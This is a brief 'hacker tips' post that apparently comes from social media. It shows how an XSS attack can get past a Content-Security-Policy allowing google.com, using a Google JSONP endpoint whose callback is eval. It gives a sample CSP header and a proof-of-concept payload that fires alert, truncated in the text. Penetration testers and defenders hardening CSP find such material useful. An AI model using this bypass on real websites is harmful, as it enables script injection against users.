​[Hacker tips] Are you afraid of CSP when you exploit an XSS ? No worries, sometimes the developer leaves something useful Exp CSP : Content-Security-Policy: script-src http://google.com XSS bypass payload : <script src="https://google.com/complete/search?client=chrome&jsonp=eval(alert(1…));"></script>​
